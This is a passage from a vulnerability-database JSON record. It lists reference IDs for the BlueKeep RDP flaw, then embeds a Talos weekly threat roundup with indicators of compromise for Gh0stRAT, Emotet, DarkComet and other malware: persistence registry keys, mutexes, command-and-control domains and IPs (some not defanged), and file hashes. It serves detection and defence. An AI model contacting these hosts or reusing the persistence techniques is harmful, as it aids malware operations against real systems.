"QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:AE1D32AF43539C7362B2E060204A5413", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:FBDC4B445E6B33502BA1650A8BD4A6E1"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "symantec", "idList": ["SMNTC-108273"]}, {"type": "talosblog", "idList": ["TALOSBLOG:00DC30A0F4EFA56F4974DF2C3FB23FBB", "TALOSBLOG:1E3663A5534D173433518B5C6F3B0E66", "TALOSBLOG:2401133934B407D6B7E1C6D91E886EBA", "TALOSBLOG:25506C78BB084870681BE9F9E1357045", "TALOSBLOG:2FC8F90E015AB54A7397D49B24BE5B5E", "TALOSBLOG:30A0CC27D6C35FC08DF198CA0AA9C626", "TALOSBLOG:340B43701E5CA96D8B4491CD801FE010", "TALOSBLOG:4C073D825207102B86D0C8999A5A28CC", "TALOSBLOG:56EE545CE9B30B21AC2FD24C6DBB5181", "TALOSBLOG:5757EE09BE22E4808719C348402D3F43", "TALOSBLOG:5A9BEF09DC8FF93E258E2D51361D11E8", "TALOSBLOG:5D2BCB335060A8EBF6F71CB579112042", "TALOSBLOG:62182E90D88C9282869F40D834CA56BA", "TALOSBLOG:6631705A9B0F56348E3E1A97469105A1", "TALOSBLOG:71D138211697B43CB345A133B54BC824", "TALOSBLOG:8DB6614E6048947EDBBD91681EE32AB7", "TALOSBLOG:97F975C073505AE88655FF1C539740A6", "TALOSBLOG:9F05FC6E227859F0165366CAA52DDB78", "TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8", "TALOSBLOG:AE189A67BCAD633AD9D7838F9DF4F6D5", "TALOSBLOG:BC6F07233A684778F6CA4B2B7C28B45B", "TALOSBLOG:C6C252288047D319ADE770A26A8DA196", "TALOSBLOG:CFBFA4A360F5A4B96A4245B783BAE4C2", "TALOSBLOG:D44D4A467C76DBF910B545640D073425", "TALOSBLOG:DC2E9A485DD55B49C0CC8932C0026F33", "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:E339E76DD9CC8BF6BC7108066B44196A", "TALOSBLOG:E352F60FA2366D4E0CC72C4BA45B2650", "TALOSBLOG:E7EA34380482751C5595EDE9DA228FA0", "TALOSBLOG:F5BDBD830CCBBD67980916B9F246B878", "TALOSBLOG:F707E3F271E987A8739DBDECFEEFAE22"]}, {"type": "thn", "idList": 
["THN:1BA2E3EE721856ECEE43B825656909B0", "THN:39C614DBFC7ED1BBBEAAD9DC8C04C7CD", "THN:3D0ED27488E8AFC91D99882663F7E35A", "THN:65DE53134A31AE62D9634C0B4AA4E81B", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:E9454DED855ABE5718E4612A2A750A98"]}, {"type": "threatpost", "idList": ["THREATPOST:08D7AB11C0B2B0668D71ADCEEB94DB1B", "THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "THREATPOST:1084DB580B431A6B8428C25B78E05C88", "THREATPOST:3D0ED9A884FBC4412C79F4B5FF005376", "THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:4D733D952DD37D57DDA47C16AEAAE1FA", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:78996437466E037C7F29EFB1FFBBAB42", "THREATPOST:85363E24CAB31CC66B298BC023E9CF95", "THREATPOST:902F021868A194A6F02A30F8709AA730", "THREATPOST:90739FC29BE2A68C72AAA4B88DB9A420", "THREATPOST:9599D75F1FEDE69B587F551FF63C7C77", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:342FB0D457FCA0DA93C711A150B5CAE2"]}, {"type": "zdt", "idList": ["1337DAY-ID-32826", "1337DAY-ID-32978", "1337DAY-ID-33275", "1337DAY-ID-33565", "1337DAY-ID-36351"]}]}, "score": {"value": 5.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:131226A6-A1E9-48A1-A5D0-AC94BAF8DFD2", "AKB:86F390BB-7946-4223-970A-D493D6DD1E0A"]}, {"type": "canvas", "idList": ["BLUEKEEP"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:83C94B14C546544713E49B16CCCBF672", "CARBONBLACK:971FEABEB6DA17E9D4D3137981B2B685"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0657"]}, {"type": "cisa", "idList": ["CISA:6EE79BF110142CD46F3BD55025F3C4AB", "CISA:81A1472B76D72ABF1AA69524AFD40F34", "CISA:A5265FFF4C417EB767D82231D2D604B8"]}, {"type": "cve", "idList": ["CVE-2019-0708"]}, {"type": 
"exploitdb", "idList": ["EDB-ID:46904"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C90C58C22E53621B5A2A2AAEBCDF2EBC"]}, {"type": "f5", "idList": ["F5:K25238311"]}, {"type": "fireeye", "idList": ["FIREEYE:385EC2DA0B6E50D0AC9113A707F5E623"]}, {"type": "githubexploit", "idList": ["03237B57-97DA-5A83-B4B2-869C01BC59F7", "05283D8D-AE42-54D4-B0CC-85DEBC639859", "0A8531EC-3F13-5F4F-84B0-58DB34580167", "0DFEFF1E-DC55-5AFB-B968-B09E2E591700", "0F2E8B00-74C7-5BE8-A801-CD92790E4C2E", "0FF9E057-0D2B-510C-944D-3EDF8DD10956", "154F9E24-FA6C-529E-8E63-1351432DF6B9", "17650B64-ADED-58F1-9BB3-3E82E1E41A7B", "188C3DB2-3A7F-5EBA-BA09-2075364C0B07", "19F70587-89FB-5855-A578-0E55C3510C59", "21DA1B2C-2176-5C7C-9A56-480839AAC71E", "2D3B67A4-8F34-55EA-A7ED-97FB2D1DFFF8", "33E38C38-2570-5B7D-910F-D6D0C9B85E25", "34097FEA-E06F-5637-817F-25A5BA9D5B34", "3CAE8C9E-534F-5617-88B5-977EE6076A10", "3D70055A-AC27-5338-B4C8-D1ED2158F5C9", "41FED3D6-8A23-5549-A390-D444A882F85D", "42C0F4E5-C3C8-5987-AF1E-3EB9DC15EADE", "462438E9-2947-5006-9134-9BA0BCC1B262", "47353949-6FA1-5C88-86DB-8E2DFD66576A", "4C2C36F6-5E15-51DD-85A7-E5828F1D8CE0", "4E477E4A-4794-5B4A-8706-915B06422C95", "523F993F-2487-5C75-A910-22605D6D57D9", "560405C4-4806-5173-B662-F9C3D776D8D4", "656CA49C-78E0-596B-BAA2-1A2890C0E150", "74F3783A-C87E-56C3-91DB-25921D7EC82E", "75BE41BF-9117-5065-8E2C-3F7F041E53AA", "75C1CD91-459D-5E2F-A3AC-FB4FE66230F7", "7D04F2C9-F17B-502A-BBE9-9B5CA537E468", "8005DDB7-67F0-50C1-95AC-3D602A70CEC8", "851959DE-3B5C-5317-868E-5D80E801E3B0", "8BAEEC14-CD55-5C55-A910-47030BEA55F7", "998F5B8B-817B-5B22-BEBB-11F0DC59638F", "9A0A7E66-6C4F-56E6-8F29-1DCE34FA1D12", "9D170C46-A745-5692-BA84-67EBFEA037FF", "A839FA86-0873-592C-AA31-2C445B4C4F29", "AA7339B7-CAB1-5DEA-8E7C-5867B328A25F", "AE03C974-B00F-5DF7-B2AF-77D6E46CD5FD", "B3DCB90F-80B1-5462-AC61-AF04513F2F3A", "B3FAEE67-7743-52ED-89D0-D83BAEA1A38D", "BA12D007-F6E5-5BB6-874F-789DCAE9524E", "BA9FEAFF-DC39-53B5-B03D-8A01486E0879", 
"BE90B1DD-521D-540C-8554-5454779256A5", "C4A313B8-6946-51D9-A5C4-EF515BAC47C9", "C50B5DBC-9051-5380-B5B3-93A023128F22", "C641C472-7F12-5C7B-9934-BE59C8B1974B", "C89AC173-55D4-50C8-A17E-42EB65710CCB", "C9FCD26D-4C04-5F36-8E61-05484E6979D6", "CA34E4C9-BC58-5284-81F7-EC6AC06EC7AF", "CD0102AD-F33A-5068-9719-30CB0CB3C152", "CF1C1A91-4D20-553C-A027-71BE18F8BAA5", "D2A01405-1B4C-5B8D-85AC-D1E23D1F3B56", "D4DF3FFF-4FBA-5ADB-88FC-A7E1BED572B9", "D6710F36-D7F3-57EA-BD83-CED78FC054F6", "D7EF2A21-5BA9-5730-90E0-E085DDFD2801", "D8B68D98-BBF3-5A69-82DD-C0760C9923D4", "DB6F697E-55A0-538F-A15B-E61B8B4E4D70", "DC8A29A1-755A-50C2-9D9D-FF11FCB054F2", "DF00B503-1F21-5ABD-B713-1F79E4D1CB9A", "E22A392B-5D30-51F4-92ED-8E10BA7EE8D2", "E46AAFC9-276F-5161-B013-393D9A538259", "E5B0F794-87CD-5152-9D64-3AB23AF5C3EF", "E72D9129-EEED-5E3C-9CD8-9BD6201170C0", "E7B26D35-BAFD-51CB-BFAC-CA7E5EA5FA9A", "E8AD52BD-4EE5-5E85-91FE-66A868E0162B", "F5B92B0D-E802-5254-8668-D6A4B1DB8004", "F922DD70-E22B-5EBE-9CAE-410224E95831", "F9EF1801-C66C-572B-B67A-9A67E04D6B06", "FBB9B577-00A5-5C82-AFC5-4A52422056F3", "FE544217-2BB0-5C05-B26C-D14EE378E8A5", "FFBF7B7B-FFD8-5A32-89B0-AAB175FD2AE6", "FFF6224F-273A-5CB1-9421-833769E01519"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190529-01-WINDOWS"]}, {"type": "ics", "idList": ["ICSMA-20-049-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51"]}, {"type": "kaspersky", "idList": ["KLA11706"]}, {"type": "kitploit", "idList": ["KITPLOIT:102871766956097088", "KITPLOIT:1049860926455958760", "KITPLOIT:1225614657733366094", "KITPLOIT:1494860154339275183", "KITPLOIT:1844185171331211854", "KITPLOIT:1986765330027575502", "KITPLOIT:3080370456145673111", "KITPLOIT:3124960652240981745", "KITPLOIT:3245813529202482542", "KITPLOIT:3359946123198241398", "KITPLOIT:3397940664053959113", "KITPLOIT:3565898196234868215", "KITPLOIT:4205221140433081492", "KITPLOIT:43221571859278589", "KITPLOIT:5485948766090500662", "KITPLOIT:5528727998547000766", 
"KITPLOIT:5769166566971079899", "KITPLOIT:5896951739767119270", "KITPLOIT:6073614302403805969", "KITPLOIT:6082359615438809301", "KITPLOIT:6972580572774284552", "KITPLOIT:724832466163115459", "KITPLOIT:727243444931520192", "KITPLOIT:777119556142010019", "KITPLOIT:7915799087007906859", "KITPLOIT:8309365460568193500", "KITPLOIT:8418780960315245103", "KITPLOIT:998955151150716619"]}, {"type": "krebs", "idList": ["KREBS:C93CCA23099AC250E702848B49677D5B"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:31DFC46E307127AF5C9FD13F15DF62DB"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP"]}, {"type": "mmpc", "idList": ["MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "mscve", "idList": ["MS:CVE-2019-0708"]}, {"type": "msrc", "idList": ["MSRC:181F9F2B53D93B5825CF48DFEB8D11C7", "MSRC:4D3D99779455BE99499289F3B3A35F84", "MSRC:6A6ED6A5B652378DCBA3113B064E973B"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9", "MSSECURE:E0AA6CC56D602890BBD5AF46A036FE67", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994152", "MYHACK58:62201994153", "MYHACK58:62201994154", "MYHACK58:62201994162", "MYHACK58:62201994234", "MYHACK58:62201994259", "MYHACK58:62201994388", "MYHACK58:62201995523", "MYHACK58:62201995881"]}, {"type": "nessus", "idList": ["7286.PASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108611", "OPENVAS:1361412562310814894", "OPENVAS:1361412562310815051", "OPENVAS:1361412562310815054"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153133"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5", "QUALYSBLOG:FBDC4B445E6B33502BA1650A8BD4A6E1"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "symantec", 
"idList": ["SMNTC-108273"]}, {"type": "talosblog", "idList": ["TALOSBLOG:2401133934B407D6B7E1C6D91E886EBA", "TALOSBLOG:30A0CC27D6C35FC08DF198CA0AA9C626", "TALOSBLOG:71D138211697B43CB345A133B54BC824", "TALOSBLOG:97F975C073505AE88655FF1C539740A6", "TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8", "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:F5BDBD830CCBBD67980916B9F246B878"]}, {"type": "thn", "idList": ["THN:1BA2E3EE721856ECEE43B825656909B0", "THN:3D0ED27488E8AFC91D99882663F7E35A", "THN:65DE53134A31AE62D9634C0B4AA4E81B"]}, {"type": "threatpost", "idList": ["THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:4D733D952DD37D57DDA47C16AEAAE1FA", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:342FB0D457FCA0DA93C711A150B5CAE2"]}, {"type": "zdt", "idList": ["1337DAY-ID-32826"]}]}, "exploitation": null, "vulnersScore": 5.0}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{"talosblog": [{"lastseen": "2019-09-13T22:32:07", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 6 and Sept. 13. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d7bff2f76fd0.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Dropper.Gh0stRAT-7155936-0 | Dropper | Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. 
Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks. \nDoc.Downloader.Emotet-7155084-0 | Downloader | Emotet is a banking trojan that remains relevant due to its ability to evolve and bypass antivirus products. It is commonly spread via malicious email attachments and links. \nWin.Dropper.DarkComet-7154925-1 | Dropper | DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system. \nWin.Virus.Expiro-7153559-0 | Virus | Expiro is a known file infector and information stealer that hinders analysis with anti-debugging and anti-analysis tricks. \nWin.Ransomware.Shade-7158472-0 | Ransomware | Shade, also known as Troldesh, is a ransomware family typically spread via malicious email attachments. \nWin.Packed.Tofsee-7150793-1 | Packed | Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. 
\n \n* * *\n\n## Threat Breakdown\n\n### Win.Dropper.Gh0stRAT-7155936-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BITS \nValue Name: Version ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BITS \nValue Name: Group ` | 24 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Lostlove_K ` | 6 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\DEFGHI KLMNOPQR TUV \nValue Name: Description ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\DEFGHI KLMNOPQR TUV \nValue Name: Start ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\DEFGHI KLMNOPQR TUV \nValue Name: DisplayName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\DEFGHI KLMNOPQR TUV \nValue Name: WOW64 ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\DEFGHI KLMNOPQR TUV \nValue Name: ObjectName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\DEFGHI KLMNOPQR TUV \nValue Name: ErrorControl ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB \nValue Name: Description ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB \nValue Name: Type ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB \nValue Name: Start ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB \nValue Name: ErrorControl ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB \nValue Name: ImagePath ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB \nValue Name: DisplayName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB \nValue Name: WOW64 ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IJKLMN PQRSTUVW YAB \nValue Name: ObjectName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\ABCDEF H QRS \nValue Name: Description ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\ABCDEF H QRS ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\ABCDEF H QRS 
\nValue Name: Type ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\ABCDEF H QRS \nValue Name: Start ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\ABCDEF H QRS \nValue Name: ErrorControl ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\ABCDEF H QRS \nValue Name: ImagePath ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\ABCDEF H QRS \nValue Name: DisplayName ` | 1 \nMutexes | Occurrences \n---|--- \n`127.0.0.1` | 6 \n`Global\\f75b8341-d3d4-11e9-a007-00501e3ae7b5` | 4 \n`k.ru9999.cc` | 3 \n`45.114.11.137` | 2 \n`www.ddostmd.com` | 2 \n`www.3rbb.com` | 2 \n`116.31.125.147` | 1 \n`www.baidu.com` | 1 \n`www.hkdcr.com` | 1 \n`xiaoyuer3001.f3322.net` | 1 \n`222.186.30.211` | 1 \n`192.168.1.107` | 1 \n`mm.zhangfanfan.com` | 1 \n`shenxian2016.f3322.net` | 1 \n`admin860129.f3322.net` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`45[.]114[.]11[.]137` | 2 \n`154[.]210[.]146[.]138` | 2 \n`116[.]31[.]125[.]147` | 1 \n`61[.]147[.]103[.]67` | 1 \n`222[.]186[.]30[.]211` | 1 \n`23[.]238[.]148[.]74` | 1 \n`221[.]217[.]66[.]122` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`k[.]ru9999[.]cc` | 3 \n`www[.]3rbb[.]com` | 2 \n`WWW[.]DDOSTMD[.]COM` | 2 \n`WWW[.]HKDCR[.]COM` | 1 \n`xiaoyuer3001[.]f3322[.]net` | 1 \n`mm[.]zhangfanfan[.]com` | 1 \n`shenxian2016[.]f3322[.]net` | 1 \n`admin860129[.]f3322[.]net` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%ProgramFiles%\\svchost.exe` | 4 \n \n#### File Hashes\n\n` 121441b204dbf7a02c8f4357452c99592ab9bdeb676089ccf1f24071f740251b 130abeb252c2a663ae691271f5d154722468d1b1b2ed23ef89d4fb9290fe081b 1326c0b36ad655c1653ce78e98204260ec8b9bddefa3cd8d2c620fab88b1a83c 25effefec15971bbe5714e37fd1f0e0e33298c691b61d04ed3af1b1359731a2b 287fcc0ae4a50e34215cfd084570d7b94ab4a3786b7260ad0b1167d1baa1a8b0 29a7a1457008f729066e21c378ea7c402fac80aa64619631565fb95a4d137652 2eb388113d650745686345acf88d32a44975e00764034875bd990aa5a80119ca 2f6d822e2ebeb0f94368b55c7c94a4f8a8b73b32214fe1f3fc5277da52411bf9 332a58814dc69a08873cc8bcbf3f8b8999dd2e7ea60ad47b635a7f735e3e85a5 47bac35158a06f748621847c0de60eab92db067f0cb95f798f0b342f508f1360 4805d4e36186da1bca0b0debf28a36ff772885f0b438d3924059ef3b9531b2ca 4de97329b8242136094b16a705fa15d3a4fe918d68b1f4f698b58ba1bcb16706 4ec20ea729ca18bed34a0dbcd2b65f049d0926ab9f94a5470bb24e600e771281 592ebcaa26bacc775420398933a0a9d63acdaa604f85805a3a3196d5a1a798ee 5f2336bb4321161e7115e63d08db836ef28be2df0cad4db9e6ce45ad3830c560 5f469e2248ae56e1077c2c87a1a15c2414352a94786845d3b65447d3ee23694d 626d4dc26ff7ec588635ad32e71fabeb8ad96887d24498ffa08a031e1e6a6bee 66db565cad627dde60e4f396ef1712f06d7b911670189ab21b870ecaada99531 681539e7da26b1130fdb65c581f5146067a51c3a42849874d6f7aa189209a754 682cf9935d0d19815becc05f3f1ed6931396f25ccf95b6deedf70a4ba94ba031 70d32abf71be74690a04ebfe9713e2287106964e46069612f37f4b0822dd8169 7b32dce1d5818551afd3efdbc3ba540c47b37942d12254fc26f16b5e3f50b96e 81f4af297381141ed4990b4837b0fb60385f29405b04df3a55d8953237aa1182 84df0240ad79f34c7172b8262ec0898e794d2448e43b1e0a577704c0b8ef40e5 
8ec17725347ae019a5d5d00345ba283483797e8477bd23e98f59d8c6f3d37811 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-_tjt54NmXbQ/XXwBQ0QNgKI/AAAAAAAACm4/yLgI6ETBz3UxbTvOXsTjdCI8Ij5rmuHxgCLcBGAsYHQ/s1600/4ec20ea729ca18bed34a0dbcd2b65f049d0926ab9f94a5470bb24e600e771281_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-0iObmS7DnOU/XXwBUqQdKoI/AAAAAAAACm8/CTgZ21bsgZI-_RL-Ai474gVsSSeT1zE0ACLcBGAsYHQ/s1600/4ec20ea729ca18bed34a0dbcd2b65f049d0926ab9f94a5470bb24e600e771281_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Doc.Downloader.Emotet-7155084-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 14 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`192[.]185[.]157[.]191` | 14 \n`152[.]160[.]245[.]7` | 14 \n`104[.]27[.]137[.]48` | 12 \n`104[.]27[.]136[.]48` | 12 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]w[.]org` | 14 \n`www[.]testrent[.]com` | 14 \n`lackify[.]com` | 14 \n`www[.]loris[.]al` | 14 \n`financialdiscourse[.]com` | 14 \n`fiberoptictestrentals[.]net` | 14 \n`INDHRIGROUP[.]COM` | 14 \n`loris[.]al` | 14 \n`testrent[.]com` | 14 \nFiles and or directories created | Occurrences \n---|--- \n`%LOCALAPPDATA%\\Microsoft\\Schemas\\MS Word_restart.xml` | 14 \n`%HOMEPATH%\\490.exe` | 14 \n \n#### File Hashes\n\n` 1157bbcfa2438b4142bc1dc163952714ef2e084cd27698f5c2f78193367f8033 3eaba85e842d0ed0489d430cb1bc37d1fca702845ba478a0e290115bebfd8827 64732ab1f700b865a24a0fe06e94a54a40724568af5381afd126096b59f18606 8ef79e33fc1ebf640f78cebe13485489f85caf08fbf4cee696aadb977f21d6e7 96ab8b7fc0b45cf2fc1277ad938ad4aabb1bcc157f0259e456b76f1684e4896e c177de169b84382b1809efd361d8e5a6ee6eff262f479724856686d03c6bb6db c707b20c85d03595b74a56768d69786c33076030059260a6684df7ac7b3a9562 cd75eda017abff329abfa5162be02c8042c86730dd948a6b423d3ebce5f5e3b8 e09474de88f323075c3ef4ba54c458e3275ee102b72a2bfc4894e79a9703c542 e192e2125ef244cff6787b3cba927d3e047fbd5d54dffd66d885a8c1789f2cde e79e52b33e81b6d039817aa3cf87726db6de496fcb36477f29483a5730dd2874 f256396752c6a4164b4097d493b202de43fb8f8d7bba372dcd7ba45ba3edfd16 f54ad758e4ee395a12956b665b611ad69b622e672d9f4086e8754f4b301cfb04 f679763abeea019bdfdc22e23d9be3159ca1f325453f34e94954bee50176664c `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Uo1jBt5noJs/XXwBoNs0JbI/AAAAAAAACnI/vfymPbMw1TkjDLvPBXI6ma8FdjwUBVGNQCLcBGAsYHQ/s1600/f256396752c6a4164b4097d493b202de43fb8f8d7bba372dcd7ba45ba3edfd16_amp.png>)\n\n \n\n\n#### 
ThreatGrid\n\n[](<https://1.bp.blogspot.com/-Vnv01PkiKN8/XXwBvmAelUI/AAAAAAAACnM/F6PqInY2DPs-eLtrGWuzgUIqbk9D7NCwwCLcBGAsYHQ/s1600/f256396752c6a4164b4097d493b202de43fb8f8d7bba372dcd7ba45ba3edfd16_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-_ClhmaTr-8Y/XXwB0pSLLOI/AAAAAAAACnQ/1P4pHKcOjiAgQ1joICald2fVK2PsfPAVACLcBGAsYHQ/s1600/c707b20c85d03595b74a56768d69786c33076030059260a6684df7ac7b3a9562_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.DarkComet-7154925-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\DC3_FEXEC ` | 5 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: UserInit ` | 4 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: EnableFirewall ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DisableNotifications ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA 